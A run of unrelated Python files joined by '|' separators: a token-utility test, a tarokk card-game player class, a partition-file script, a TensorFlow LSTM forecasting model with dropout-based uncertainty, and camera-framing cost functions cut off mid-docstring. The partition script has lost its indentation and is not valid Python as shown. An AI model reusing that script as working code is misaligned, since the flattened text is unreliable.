            OrderedDict({'text': 'an', 'misc': {'SpaceAfter': 'Yes'}}),
            OrderedDict({'text': 'e'}),
            OrderedDict({'text': '-', 'misc': {}}),
            OrderedDict({'text': 'mail', 'misc': {}}),
            OrderedDict({'text': '.'}),
        ]
        result = surface_string(sentence)
        assert "I'm sending an e-mail." == result, result

    def test_subtract_tokens(self):
        # Set difference keyed on 'id'; neither input list may be mutated.
        first = [OrderedDict({'id': n}) for n in (1, 2, 3)]
        second = [OrderedDict({'id': n}) for n in (2, 3, 4)]
        first_snapshot = list(first)
        second_snapshot = list(second)
        result = subtract_tokens(first, second)
        assert [OrderedDict([('id', 1)])] == result, result
        assert first == first_snapshot
        assert second == second_snapshot
        result = subtract_tokens(first, first)
        assert [] == result, result
        result = subtract_tokens([], first)
        assert [] == result, result
        result = subtract_tokens(first, [])
        assert first == result, result
|
class Player:
    """A tarokk player: holds a hand of cards plus turn/bidding state."""

    def __init__(self, name, position):
        self.name = name
        self.hand = []                  # cards currently held
        self.isNextPlayer = False
        self.isStarter = False
        self.position = position        # seat index at the table
        self.hasPlacedCard = False
        self.winBidding = False
        self.wantBiddingMore = False
        self.gainingCard = 0
        self.partnerNumber = 0

    def draw(self, deck):
        """Take the top card from *deck* into this player's hand."""
        self.hand.append(deck.drawCard())

    def showHand(self):
        """Print the player's name followed by every card in hand."""
        print("## - " + self.name)
        for card in self.hand:
            card.show()

    def play(self, index):
        """Remove (play) the card at *index* from the hand."""
        # idiom fix: `del` instead of calling __delitem__ directly
        del self.hand[index]

    def getFirstTarokk(self, hand):
        """Return the index of the first Tarokk card, or 0 if there is none.

        NOTE(review): the *hand* parameter is accepted but ignored; the
        method scans self.hand, preserving the original behavior.
        """
        return next(
            (i for i, card in enumerate(self.hand) if card.suit == 'Tarokk'),
            0,
        )

    def licit(self, number):
        """Place a bid; currently simply echoes the chosen bid back."""
        return number

    def canLicit(self, hand):
        """Return True if *hand* contains an honor (Tarokk 1, 21 or 22)."""
        return any(
            card.suit == "Tarokk" and card.value in (1, 21, 22)
            for card in hand
        )

    def sortingCards(self, hand):
        """Sort *hand* by suit (Pikk, Treff, Karo, Kor, Tarokk), each suit
        ascending by card value, and store the result in self.hand.

        Cards with an unrecognized suit are dropped (as before).
        """
        suit_order = ("Pikk", "Treff", "Karo", "Kor", "Tarokk")
        piles = {suit: [] for suit in suit_order}
        for card in hand:
            if card.suit in piles:
                piles[card.suit].append(card)
        self.hand = [
            card
            for suit in suit_order
            for card in sorted(piles[suit], key=lambda c: c.value)
        ]
|
import sys
import os
"""
Open a partition file, and add an A after each G[...]
to select median gamma rates instead of mean.
Then output the new partitions into another file
"""
if (len(sys.argv) != 3):
print("usage: python add_median.py input_part output_part")
sys.exit(1)
input_part = sys.argv[1]
output_part = sys.argv[2]
if (input_part == output_part):
print("Error: both files are the same. Exiting")
sys.exit(2)
lines = open(input_part).readlines()
with open(output_part, "w") as writer:
for line in lines:
split_line = line.split(",")
model = split_line[0]
if (model == "LG4M"):
model = "LG4M+G4"
elif (model == "LG4M+I"):
model = "LG4M+I+G4"
split = model.split("+")
for idx, elem in enumerate(split):
if (elem.startswith("G")):
split[idx] = elem + "A"
split_line[0] = "+".join(split)
writer.write(",".join(split_line))
|
import tensorflow as tf
import numpy as np
from sklearn import datasets
from sklearn.model_selection import train_test_split
from pandas import read_csv
from sklearn.preprocessing import MinMaxScaler
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
from tensorflow.contrib import rnn
# from utils.preprocessing_data import Timeseries
from model.utils.preprocessing_data_forBNN import MultivariateTimeseriesBNNUber
import time
"""This class build the model BNN with initial function and train function"""
class Model:
    """Encoder-decoder LSTM with an MLP inference head and MC-dropout
    uncertainty sampling (Uber-style BNN) for multivariate time series.

    Training is two-phase: (1) encoder-decoder reconstruction, then
    (2) an inference MLP fed by the encoder's final hidden state plus
    external features. Dropout stays active at prediction time so the
    B-sample loop in fit() yields an uncertainty estimate.
    """
    def __init__(self, original_data = None, external_feature = None, train_size = None, valid_size = None,
        sliding_encoder = None, sliding_decoder = None, sliding_inference = None,
        batch_size = None, num_units_LSTM = None, num_layers = None,
        activation = None, optimizer = None,
        # n_input = None, n_output = None,
        learning_rate = None, epochs_encoder_decoder = None, epochs_inference = None,
        input_dim = None, num_units_inference = None, patience = None, number_out_decoder = 1, dropout_rate = 0.8):
        """Store hyper-parameters; all heavy work happens in fit().

        NOTE(review): `num_layers` is accepted but never stored or used --
        layer count is taken from len(num_units_LSTM) instead.
        """
        self.original_data = original_data
        self.external_feature = external_feature
        self.train_size = train_size
        self.valid_size = valid_size
        self.sliding_encoder = sliding_encoder
        self.sliding_decoder = sliding_decoder
        self.sliding_inference = sliding_inference
        self.batch_size = batch_size
        self.num_units_LSTM = num_units_LSTM
        self.activation = activation
        self.optimizer = optimizer
        # self.n_input = n_input
        # self.n_output = n_output
        self.learning_rate = learning_rate
        self.epochs_encoder_decoder = epochs_encoder_decoder
        self.epochs_inference = epochs_inference
        self.input_dim = input_dim
        self.num_units_inference = num_units_inference
        self.patience = patience
        self.number_out_decoder = number_out_decoder
        self.dropout_rate = dropout_rate
    def preprocessing_data(self):
        """Build encoder/decoder/inference train-valid-test splits (plus the
        y min/max used later to undo scaling) via the project's
        MultivariateTimeseriesBNNUber helper."""
        timeseries = MultivariateTimeseriesBNNUber(self.original_data, self.external_feature, self.train_size, self.valid_size, self.sliding_encoder, self.sliding_decoder, self.sliding_inference, self.input_dim,self.number_out_decoder)
        self.train_x_encoder, self.valid_x_encoder, self.test_x_encoder, self.train_x_decoder, self.valid_x_decoder, self.test_x_decoder, self.train_y_decoder, self.valid_y_decoder, self.test_y_decoder, self.min_y, self.max_y, self.train_x_inference, self.valid_x_inference, self.test_x_inference, self.train_y_inference, self.valid_y_inference, self.test_y_inference = timeseries.prepare_data()
    def init_RNN(self, num_units, activation):
        """Build a stacked LSTM (one layer per entry in num_units), each layer
        wrapped in variational dropout.

        Dropout is applied unconditionally (no training flag), so it is also
        active at prediction time -- this is what makes the B-sample loop in
        fit() produce MC-dropout uncertainty.
        """
        # Debug prints left over from development.
        print (len(self.test_y_inference))
        print (self.test_x_encoder[-1])
        print (self.test_x_inference[-1])
        print (self.test_y_inference[-1])
        print(num_units)
        num_layers = len(num_units)
        print (num_layers)
        hidden_layers = []
        for i in range(num_layers):
            if(i==0):
                # First layer: inputs are raw features, so keep them intact
                # (input_keep_prob = 1.0) and declare input_size = input_dim.
                cell = tf.contrib.rnn.LSTMCell(num_units[i],activation = activation)
                cell = tf.nn.rnn_cell.DropoutWrapper(cell,
                    input_keep_prob = 1.0,
                    output_keep_prob = self.dropout_rate,
                    state_keep_prob = self.dropout_rate,
                    variational_recurrent = True,
                    input_size = self.input_dim,
                    dtype=tf.float32)
                hidden_layers.append(cell)
            else:
                # Deeper layers: inputs come from the previous LSTM layer.
                cell = tf.contrib.rnn.LSTMCell(num_units[i],activation = activation)
                cell = tf.nn.rnn_cell.DropoutWrapper(cell,
                    input_keep_prob = self.dropout_rate,
                    output_keep_prob = self.dropout_rate,
                    state_keep_prob = self.dropout_rate,
                    variational_recurrent = True,
                    input_size = self.num_units_LSTM[i-1],
                    dtype=tf.float32)
                hidden_layers.append(cell)
        rnn_cells = tf.contrib.rnn.MultiRNNCell(hidden_layers, state_is_tuple = True)
        return rnn_cells
    def mlp(self, input, num_units, activation):
        """Feed-forward head: dense + dropout per entry in num_units, then a
        single-unit output layer (activation applied to the output too)."""
        num_layers = len(num_units)
        prev_layer = input
        for i in range(num_layers):
            prev_layer = tf.layers.dense(prev_layer,
                num_units[i],
                activation = activation,
                name = 'layer'+str(i))
            # Convert keep-probability into the drop rate tf.layers expects.
            drop_rate = 1 - self.dropout_rate
            prev_layer = tf.layers.dropout(prev_layer , rate = drop_rate)
        prediction = tf.layers.dense(inputs=prev_layer,
            units=1,
            activation = activation,
            name = 'output_layer')
        return prediction
    def early_stopping(self, array, patience):
        """Return False (stop) when the last `patience` losses are ALL worse
        than the loss immediately before that window; True means keep going."""
        value = array[len(array) - patience - 1]
        arr = array[len(array)-patience:]
        check = 0
        for val in arr:
            if(val > value):
                check += 1
        if(check == patience):
            return False
        else:
            return True
    def fit(self):
        """Build the TF1 graph, train encoder-decoder then inference head,
        sample B=50 MC-dropout predictions for uncertainty, and write
        history/prediction/uncertainty/state CSVs. Returns [MAE, RMSE]
        averaged over the B samples."""
        self.preprocessing_data()
        # Debug dump of the prepared splits.
        print ("================check preprocessing data ok==================")
        print ('self.train_x_encoder')
        print (self.train_x_encoder[0])
        print ('self.train_x_decoder')
        print (self.train_x_decoder[0])
        print ('self.train_y_decoder')
        print (self.train_y_decoder[0])
        print (self.train_y_decoder.shape)
        print ('self.train_x_inference')
        print (self.train_x_inference[0])
        print ('self.train_y_inference')
        print (self.train_y_inference[0])
        print ('test y')
        print (self.test_y_inference)
        print (self.min_y)
        print (self.max_y)
        print (len(self.train_x_encoder))
        # lol111
        self.train_x_encoder = np.array(self.train_x_encoder)
        self.train_x_decoder = np.array(self.train_x_decoder)
        self.test_x_encoder = np.array(self.test_x_encoder)
        self.test_x_decoder = np.array(self.test_x_decoder)
        self.test_y_decoder = np.array(self.test_y_decoder)
        self.train_x_inference = np.array(self.train_x_inference)
        # print ('self.train_x_inference')
        # print (self.train_x_inference)
        self.test_x_inference = np.array(self.test_x_inference)
        self.n_input_encoder = self.train_x_encoder.shape[1]
        self.n_input_decoder = self.train_x_decoder.shape[1]
        self.n_output_inference = self.train_y_inference.shape[1]
        self.n_output_encoder_decoder = self.train_y_decoder.shape[1]
        # Integer codes -> TF activation / optimizer objects.
        if(self.activation == 1):
            activation = tf.nn.sigmoid
        elif(self.activation == 2):
            activation= tf.nn.relu
        elif(self.activation== 3):
            activation = tf.nn.tanh
        elif(self.activation == 4):
            activation = tf.nn.elu
        if(self.optimizer == 1):
            optimizer = tf.train.MomentumOptimizer(learning_rate = self.learning_rate, momentum = 0.9)
        elif(self.optimizer == 2):
            optimizer = tf.train.AdamOptimizer(learning_rate = self.learning_rate)
        else:
            optimizer = tf.train.RMSPropOptimizer(learning_rate = self.learning_rate)
        print (self.sliding_encoder)
        print (len(self.original_data))
        tf.reset_default_graph()
        # NOTE(review): '/' makes these shape dims floats under Python 3
        # (x3 below casts with int(...)); confirm this runs on Python 2 or
        # add the same cast here.
        x1 = tf.placeholder("float",[None, self.sliding_encoder*len(self.original_data)/self.input_dim, self.input_dim])
        x2 = tf.placeholder("float",shape = (None, self.sliding_decoder*len(self.original_data)/self.input_dim, self.input_dim))
        # Encoder-decoder graph: one decoder head, or two when
        # number_out_decoder != 1.
        if(self.number_out_decoder == 1):
            y1 = tf.placeholder("float", [None, self.sliding_decoder])
            with tf.variable_scope('encoder'):
                encoder = self.init_RNN(self.num_units_LSTM,activation)
                # input_encoder=tf.unstack(x1 ,[None,self.sliding_encoder/self.time_step,self.time_step])
                outputs_encoder, new_state_encoder=tf.nn.dynamic_rnn(encoder, x1, dtype="float32")
                outputs_encoder = tf.identity(outputs_encoder, name='outputs_encoder')
            with tf.variable_scope('decoder'):
                decoder = self.init_RNN(self.num_units_LSTM,activation)
                # Decoder starts from the encoder's final state.
                outputs_decoder, new_state_decoder=tf.nn.dynamic_rnn(decoder, x2,dtype="float32", initial_state=new_state_encoder)
            # Last unit of each decoder step is the reconstruction target.
            prediction = outputs_decoder[:,:,-1]
            loss_encoder_decoder = tf.reduce_mean(tf.square(y1-prediction))
            optimizer_encoder_decoder = optimizer.minimize(loss_encoder_decoder)
        else:
            y11 = tf.placeholder("float", [None, self.sliding_decoder])
            y12 = tf.placeholder("float", [None, self.sliding_decoder])
            with tf.variable_scope('encoder'):
                encoder = self.init_RNN(self.num_units_LSTM,activation)
                # input_encoder=tf.unstack(x1 ,[None,self.sliding_encoder/self.time_step,self.time_step])
                outputs_encoder,new_state_encoder=tf.nn.dynamic_rnn(encoder, x1, dtype="float32")
                # with tf.control_dependencies([state.assign(state_encoder)]):
                # outputs_encoder = tf.identity(outputs_encoder, name='outputs_encoder')
            with tf.variable_scope('decoder1'):
                decoder = self.init_RNN(self.num_units_LSTM,activation)
                outputs_decoder1,new_state_decoder1=tf.nn.dynamic_rnn(decoder, x2,dtype="float32", initial_state = new_state_encoder)
            with tf.variable_scope('decoder2'):
                decoder = self.init_RNN(self.num_units_LSTM,activation)
                outputs_decoder2,new_state_decoder2=tf.nn.dynamic_rnn(decoder, x2,dtype="float32", initial_state = new_state_encoder)
            prediction1 = outputs_decoder1[:,:,-1]
            prediction2 = outputs_decoder2[:,:,-1]
            loss_encoder_decoder = tf.reduce_mean(tf.square(y11-prediction1) + tf.square(y12-prediction2))
            optimizer_encoder_decoder = optimizer.minimize(loss_encoder_decoder)
        # out_weights=tf.Variable(tf.random_normal([int(self.sliding_decoder*len(self.original_data)/self.input_dim), self.n_output_encoder_decoder]))
        # out_bias=tf.Variable(tf.random_normal([self.n_output_encoder_decoder]))
        # else:
        #
        # Inference branch: external features concatenated with the
        # encoder's final hidden state feed the MLP head.
        x3 = tf.placeholder("float",[None, 1, int(self.sliding_inference*len(self.external_feature))])
        y2 = tf.placeholder("float", [None, self.n_output_inference])
        # input_decoder=tf.unstack(x2 ,self.sliding_decoder/self.time_step,self.time_step)
        # prediction = outputs_decoder[:,:,-1]
        # prediction=activation(tf.matmul(outputs_decoder[:,:,-1],out_weights)+out_bias)
        # prediction_inverse = prediction * (self.max_y[0] - self.min_y[0]) + self.min_y[0]
        # y1_inverse = y1 * (self.max_y[0] - self.min_y[0]) + self.min_y[0]
        # loss_function
        # loss_encoder_decoder = tf.reduce_mean(tf.square(y1-prediction))
        #optimization
        # optimizer_encoder_decoder = optimizer.minimize(loss_encoder_decoder)
        # state = tf.tile(state_encoder[-1].h)
        # state = tf.shape(x3)[0]
        state = tf.reshape(new_state_encoder[-1].h, [tf.shape(x3)[0], 1, self.num_units_LSTM[-1]])
        input_inference = tf.concat([x3,state],2)
        input_inference = tf.reshape(input_inference,[tf.shape(x3)[0], self.sliding_inference*len(self.external_feature) + self.num_units_LSTM[-1]])
        # state_encoder = np.reshape(state_encoder[-1].h, [4])
        # state_encoder = tf.reshape(state_encoder[-1].h, [None, 1, self.num_units])
        # input_inference = tf.concat([x3, state_encoder[-1].h],0)
        output_inference = self.mlp(input_inference, self.num_units_inference, activation)
        # hidden_value1 = tf.layers.dense(input_inference, self.num_units_inference, activation=activation)
        # hidden1 = tf.layers.dropout(hidden_value1 , rate = 0.9)
        # hidden_value2 = tf.layers.dense(hidden_value1, 4, activation=activation)
        # output_inference = tf.layers.dense(hidden1,self.n_output_inference, activation=activation)
        # # loss
        loss_inference = tf.reduce_mean(tf.square(y2-output_inference))
        #optimization
        optimizer_inference = optimizer.minimize(loss_inference)
        # Undo min-max scaling on predictions before error metrics.
        output_inference_inverse = output_inference * (self.max_y[0] - self.min_y[0]) + self.min_y[0]
        # NOTE(review): predictions are inverse-scaled but y2 is not --
        # confirm the inference targets are already in original units.
        y2_inverse = y2
        MAE = tf.reduce_mean(tf.abs(tf.subtract(output_inference_inverse,y2_inverse)) )
        RMSE = tf.sqrt(tf.reduce_mean(tf.square(tf.subtract(output_inference_inverse,y2_inverse))))
        cost_train_encoder_decoder_set = []
        cost_valid_encoder_decoder_set = []
        cost_train_inference_set = []
        cost_valid_inference_set = []
        epoch_set=[]
        init=tf.global_variables_initializer()
        with tf.Session() as sess:
            saver = tf.train.Saver()
            sess.run(init)
            # training encoder_decoder
            print ("start training encoder_decoder")
            if (self.number_out_decoder == 1):
                # Phase 1 (single decoder): mini-batch training with
                # early stopping on the training loss history.
                for epoch in range(self.epochs_encoder_decoder):
                    start_time = time.time()
                    # Train with each example
                    print ('epoch encoder_decoder: ', epoch+1)
                    total_batch = int(len(self.train_x_encoder)/self.batch_size)
                    # print (total_batch)
                    # sess.run(updates)
                    avg_cost = 0
                    for i in range(total_batch):
                        batch_xs_encoder,batch_xs_decoder = self.train_x_encoder[i*self.batch_size:(i+1)*self.batch_size], self.train_x_decoder[i*self.batch_size:(i+1)*self.batch_size]
                        batch_ys = self.train_y_decoder[i*self.batch_size:(i+1)*self.batch_size]
                        # print (sess.run(outputs_encoder,feed_dict={x1: batch_xs_encoder,x2: batch_xs_decoder, y1:batch_ys}))
                        # print (sess.run(new_state_encoder,feed_dict={x1: batch_xs_encoder,x2: batch_xs_decoder, y1:batch_ys}))
                        sess.run(optimizer_encoder_decoder,feed_dict={x1: batch_xs_encoder,x2: batch_xs_decoder, y1:batch_ys})
                        avg_cost += sess.run(loss_encoder_decoder,feed_dict={x1: batch_xs_encoder,x2: batch_xs_decoder, y1:batch_ys})/total_batch
                        if(i == total_batch -1):
                            a = sess.run(new_state_encoder,feed_dict={x1: batch_xs_encoder})
                    # Display logs per epoch step
                    print ("Epoch:", '%04d' % (epoch+1),"cost=", "{:.9f}".format(avg_cost))
                    cost_train_encoder_decoder_set.append(avg_cost)
                    val_cost = sess.run(loss_encoder_decoder, feed_dict={x1:self.valid_x_encoder,x2:self.valid_x_decoder, y1: self.valid_y_decoder})
                    cost_valid_encoder_decoder_set.append(val_cost)
                    if (epoch > self.patience):
                        if (self.early_stopping(cost_train_encoder_decoder_set, self.patience) == False):
                            print ("early stopping encoder-decoder training")
                            break
                    print ("Epoch encoder-decoder finished")
                    print ('time for epoch encoder-decoder: ', epoch + 1 , time.time()-start_time)
                print ('training encoder-decoder ok!!!')
            else:
                # Phase 1 (two decoder heads): same loop with y11/y12 targets.
                for epoch in range(self.epochs_encoder_decoder):
                    start_time = time.time()
                    # Train with each example
                    print ('epoch encoder_decoder: ', epoch+1)
                    total_batch = int(len(self.train_x_encoder)/self.batch_size)
                    # print (total_batch)
                    # sess.run(updates)
                    avg_cost = 0
                    for i in range(total_batch):
                        batch_xs_encoder,batch_xs_decoder = self.train_x_encoder[i*self.batch_size:(i+1)*self.batch_size], self.train_x_decoder[i*self.batch_size:(i+1)*self.batch_size]
                        batch_ys1, batch_ys2 = self.train_y_decoder[0][i*self.batch_size:(i+1)*self.batch_size], self.train_y_decoder[1][i*self.batch_size:(i+1)*self.batch_size]
                        sess.run(optimizer_encoder_decoder,feed_dict={x1: batch_xs_encoder,x2: batch_xs_decoder, y11:batch_ys1, y12:batch_ys2})
                        avg_cost += sess.run(loss_encoder_decoder,feed_dict={x1: batch_xs_encoder,x2: batch_xs_decoder,y11:batch_ys1, y12:batch_ys2})/total_batch
                        if(i == total_batch -1):
                            a = sess.run(new_state_encoder,feed_dict={x1: batch_xs_encoder})
                    # Display logs per epoch step
                    print ("Epoch:", '%04d' % (epoch+1),"cost=", "{:.9f}".format(avg_cost))
                    cost_train_encoder_decoder_set.append(avg_cost)
                    val_cost = sess.run(loss_encoder_decoder, feed_dict={x1:self.valid_x_encoder,x2:self.valid_x_decoder, y11: self.valid_y_decoder[0],y12: self.valid_y_decoder[1]})
                    cost_valid_encoder_decoder_set.append(val_cost)
                    if (epoch > self.patience):
                        if (self.early_stopping(cost_train_encoder_decoder_set, self.patience) == False):
                            print ("early stopping encoder-decoder training")
                            break
                    print ("Epoch encoder-decoder finished")
                    print ('time for epoch encoder-decoder: ', epoch + 1 , time.time()-start_time)
                print ('training encoder-decoder ok!!!')
            # training inferences
            # Phase 2: train the MLP head (encoder weights stay as trained,
            # its state is recomputed per batch through x1).
            print ('start training inference')
            for epoch in range(self.epochs_inference):
                start_time = time.time()
                print ("epoch inference: ", epoch+1)
                total_batch = int(len(self.train_x_inference)/self.batch_size)
                # print (total_batch)
                # sess.run(updates)
                avg_cost = 0
                for i in range(total_batch):
                    batch_xs_encoder,batch_xs_inference ,batch_ys = self.train_x_encoder[i*self.batch_size:(i+1)*self.batch_size], self.train_x_inference[i*self.batch_size:(i+1)*self.batch_size],self.train_y_inference[i*self.batch_size:(i+1)*self.batch_size]
                    # print ('input_inference')
                    s_e = sess.run(new_state_encoder,feed_dict={x1: batch_xs_encoder})
                    sess.run(optimizer_inference,feed_dict={x1: batch_xs_encoder,x3: batch_xs_inference, y2:batch_ys})
                    avg_cost += sess.run(loss_inference,feed_dict={x1: batch_xs_encoder,x3: batch_xs_inference,y2: batch_ys})/total_batch
                    # if(i == total_batch -1):
                    # print (sess.run(state_encoder,feed_dict={x1: batch_xs_encoder}))
                print ("Epoch:", '%04d' % (epoch+1),"cost=", "{:.9f}".format(avg_cost))
                cost_train_inference_set.append(avg_cost)
                # epoch_set.append(epoch+1)
                val_cost = sess.run(loss_inference, feed_dict={x1:self.valid_x_encoder,x3:self.valid_x_inference, y2: self.valid_y_inference})
                cost_valid_inference_set.append(val_cost)
                if (epoch > self.patience):
                    if (self.early_stopping(cost_train_inference_set , self.patience) == False):
                        print ("early stopping inference training")
                        break
                print ('time for epoch inference: ', epoch + 1 , time.time()-start_time)
            # output_inference_inverse = sess.run(output_inference_inverse, feed_dict={x1:self.test_x_encoder,x3:self.test_x_inference, y2: self.test_y_inference})
            # output_inference = sess.run(output_inference, feed_dict={x1:self.test_x_encoder,x3:self.test_x_inference, y2: self.test_y_inference})
            # print (output_inference)
            vector_state = sess.run(new_state_encoder[-1].h,feed_dict={x1:self.test_x_encoder})
            # MC-dropout: run B stochastic forward passes over the test set;
            # each pass differs because dropout stays active in the graph.
            outputs = []
            MSE = []
            error_model = []
            B = 50
            for i in range(B):
                print (i)
                MAEi = sess.run(MAE, feed_dict={x1:self.test_x_encoder,x3:self.test_x_inference, y2: self.test_y_inference})
                RMSEi = sess.run(RMSE, feed_dict={x1:self.test_x_encoder,x3:self.test_x_inference, y2: self.test_y_inference})
                output_inference_inversei = sess.run(output_inference_inverse, feed_dict={x1:self.test_x_encoder,x3:self.test_x_inference, y2: self.test_y_inference})
                # print ('MAE: ', MAEi)
                # print ('RMSE: ', RMSEi)
                errori = [MAEi, RMSEi]
                error_model.append(errori)
                outputs.append(output_inference_inversei)
            # Validation misfit used as the aleatoric term of the uncertainty.
            output_inference_inverse_valid = sess.run(output_inference_inverse, feed_dict={x1:self.valid_x_encoder,x3:self.valid_x_inference, y2: self.valid_y_inference})
            err_valid = 0
            error_model = np.average(error_model,axis = 0)
            for i in range(len(output_inference_inverse_valid)):
                test_valid = self.valid_y_inference * (self.max_y[0] - self.min_y[0]) + self.min_y[0]
                err_valid += np.square(output_inference_inverse_valid[i][0]-test_valid[i])/len(output_inference_inverse_valid)
            # Per-sample mean prediction and spread across the B passes.
            y_pre = []
            error = []
            for k in range(len(self.test_y_inference)):
                errork = 0
                outk = 0
                y_prei = []
                errori = []
                for t in range(B):
                    outk += outputs[t][k][0]/B
                    errork += np.square(self.test_y_inference[k] - outputs[t][k][0])
                errori.append(errork)
                y_prei.append(outk)
                y_pre.append(y_prei)
                error.append(errori)
            # print ("====================")
            # print (outputs[0])
            # print (outputs[1])
            # print(y_pre)
            # # lol
            # print (error)
            # print(err_valid)
            uncertainty = []
            for i in range(len(error)):
                # NOTE(review): err_valid starts as the scalar 0 and is
                # indexed with [0] here -- this only works when the +=
                # above broadcast it to an array; confirm.
                uncertainty_i = np.sqrt(error[i][0] + err_valid[0])
                uncertainty.append(uncertainty_i)
            # Encode the hyper-parameter configuration into output filenames.
            name_LSTM = ""
            for i in range(len(self.num_units_LSTM)):
                if (i == len(self.num_units_LSTM) - 1):
                    name_LSTM += str(self.num_units_LSTM[i])
                else:
                    name_LSTM += str(self.num_units_LSTM[i]) +'_'
            name_inference = ""
            for i in range(len(self.num_units_inference)):
                if (i == len(self.num_units_inference) - 1):
                    name_inference += str(self.num_units_inference[i])
                else:
                    name_inference += str(self.num_units_inference[i]) +'_'
            folder_to_save_result = 'results/multivariate/cpu/5minutes/bnn_multivariate_uber_ver2/'
            file_name = str(self.sliding_encoder) + '-' + str(self.sliding_decoder) + '-' + str(self.sliding_inference) + '-' + str(self.batch_size) + '-' + name_LSTM + '-' + str(self.activation)+ '-' + str(self.optimizer) + '-' + str(self.input_dim) + '-' + name_inference +'-'+str(self.number_out_decoder) +'-'+str(self.dropout_rate)
            history_file = folder_to_save_result + 'history/' + file_name + '.png'
            prediction_file = folder_to_save_result + 'prediction/' + file_name + '.csv'
            vector_state_file = folder_to_save_result + 'vector_representation/' + file_name + '.csv'
            uncertainty_file = folder_to_save_result + 'uncertainty/' + file_name + '.csv'
            save_path = saver.save(sess, 'results/multivariate/cpu/5minutes/bnn_multivariate_uber_ver2/model_saved/' + file_name+'/model')
            # Persist loss curves, predictions, uncertainty and encoder states.
            plt.plot(cost_train_inference_set)
            plt.plot(cost_valid_inference_set)
            plt.plot(cost_train_encoder_decoder_set)
            plt.plot(cost_valid_encoder_decoder_set)
            plt.title('model loss')
            plt.ylabel('loss')
            plt.xlabel('epoch')
            plt.legend(['train_inference', 'validation_inference','train_encoder_decoder', 'validation_encoder_decoder'], loc='upper left')
            # plt.show()
            # plt.savefig('/home/thangnguyen/hust/lab/machine_learning_handling/history/history_mem.png')
            plt.savefig(history_file)
            plt.close()
            predictionDf = pd.DataFrame(np.array(y_pre))
            # predictionDf.to_csv('/home/thangnguyen/hust/lab/machine_learning_handling/results/result_mem.csv', index=False, header=None)
            predictionDf.to_csv(prediction_file, index=False, header=None)
            uncertaintyDf = pd.DataFrame(np.array(uncertainty))
            uncertaintyDf.to_csv(uncertainty_file, index=False, header=None)
            # errorDf.to_csv(prediction_file, index=False, header=None)
            vector_stateDf = pd.DataFrame(np.array(vector_state))
            vector_stateDf.to_csv(vector_state_file, index=False, header=None)
            sess.close()
        return error_model
|
"""cost functions for camera optimization
Lin Sun
May 16 2019
"""
import math
from utils import utils
from cost_functions import cost_curve
"""
cost functions can be divided into:
current quality functions (node cost)
transfer functions (edge cost)
duration function (hops cost)
"""
# Rendered frame geometry and the weight vectors shared by the cost terms.
FRAMEX = 1024
FRAMEY = 768
FRAMESIZE = FRAMEX * FRAMEY
FRAME_DIAGONAL = math.sqrt(FRAMEX ** 2 + FRAMEY ** 2)
QUALITY_WEIGHTS = [0.4, 0.5, 0.2, 0.1, 2, 0.2]
TRANSFER_WEIGHTS = [0.2, 0.2, 0.3, 0.3]
def getVisibilityCost(subVis, objVis):
    """Node cost for on-screen visibility of the current action.

    :param subVis: per-subject lists of visible pixel areas
    :param objVis: per-object lists of visible pixel areas
    :return: 1 minus the fraction of the frame covered by subjects and
        objects of the action -- 0 when they fill the frame, 1 when
        nothing relevant is visible.
    """
    # TODO: Should it consider object or character actual size?
    visible_area = sum(sum(parts) for parts in subVis)
    visible_area += sum(sum(parts) for parts in objVis)
    return 1 - visible_area / FRAMESIZE
def getHitchCockCost(actions_list, subVis_list, objVis_list):
    """
    :param actions_list: list of actions active at this node
    :param subVis_list: per-action lists of subject visibilities
    :param objVis_list: per-action lists of object visibilities
    :return: hitchcock cost averaged over all actions

    description:
    Hitchcock mentioned "the size of an object in the frame should be equal to its importance in the story at that moment".
    hitchcock cost measures whether the character/item on-screen visibility is proportional to its importance in the action.
    Character visibility has 6 parts: [front head, back head, front upper body, back upper body, front lower body, back lower body].
    Item visibility has 2 parts: [front, back].
    For a single action, the importance of subject vs object differs, and the importance of body parts differs.
    To compute the cost: find the action, get its SO (subject/object importance split), then the per-part importance,
    and compare each part's share of total visibility with its importance share.
    """
    if not actions_list:
        # no actions at this node -> nothing to penalize (avoids ZeroDivisionError)
        return 0
    hcCosts = []
    for a in range(len(actions_list)):
        action = actions_list[a]
        subVis = subVis_list[a]
        objVis = objVis_list[a]
        if not objVis:
            # action has no objects: only subjects contribute
            totalVis = sum(map(sum, subVis))
            if totalVis == 0:
                # nothing visible at all: maximum penalty
                hcCosts.append(1)
                continue
            cost = 0
            subjectImportance = utils.getSOImportance(action)[0] / len(subVis)
            bodyImportance = utils.getBodyImportance(action)
            itemImportance = utils.getObjectImportance()
            # subjects can be characters (6 parts) or items (2 parts)
            for s in range(len(subVis)):
                if len(subVis[s]) == 6:
                    for j in range(6):
                        cost += abs(subjectImportance * bodyImportance[j] - subVis[s][j] / totalVis)
                if len(subVis[s]) == 2:
                    for j in range(2):
                        cost += abs(subjectImportance * itemImportance[j] - subVis[s][j] / totalVis)
            hcCosts.append(cost / len(subVis))
        else:
            # this action has objects: both sides contribute
            totalVis = sum(map(sum, subVis)) + sum(map(sum, objVis))
            if totalVis == 0:
                hcCosts.append(1)
                continue
            cost = 0
            subjectImportance = utils.getSOImportance(action)[0] / len(subVis)
            objectImportance = utils.getSOImportance(action)[1] / len(objVis)
            bodyImportance = utils.getBodyImportance(action)
            itemImportance = utils.getObjectImportance()
            for s in range(len(subVis)):
                if len(subVis[s]) == 6:
                    # character subject
                    for j in range(6):
                        cost += abs(subjectImportance * bodyImportance[j] - subVis[s][j] / totalVis)
                if len(subVis[s]) == 2:
                    # item subject
                    # BUG FIX: items must be weighted by item importance; the
                    # original used bodyImportance here (itemImportance was
                    # computed but never used)
                    for j in range(2):
                        cost += abs(subjectImportance * itemImportance[j] - subVis[s][j] / totalVis)
            for o in range(len(objVis)):
                if len(objVis[o]) == 6:
                    # character object
                    for j in range(6):
                        cost += abs(objectImportance * bodyImportance[j] - objVis[o][j] / totalVis)
                if len(objVis[o]) == 2:
                    # item object — same fix as above
                    for j in range(2):
                        cost += abs(objectImportance * itemImportance[j] - objVis[o][j] / totalVis)
            hcCosts.append(cost / (len(subVis) + len(objVis)))
    return sum(hcCosts) / len(hcCosts)
def getLookRoomCost(eyepos, eyeThetas):
    """
    :param eyepos: on-screen eye positions, each [x, y] or ["NA", "NA"] when off screen
    :param eyeThetas: on-screen eye directions (currently unused, see TODO below)
    :return: average lookroom cost over all characters

    description:
    Look room is the distance from the left boundary to a character's on-screen eye
    position, and from the eye position to the right boundary.
    If the character looks right, the right-side look room should be larger;
    if the character looks left, the left-side look room should be larger.
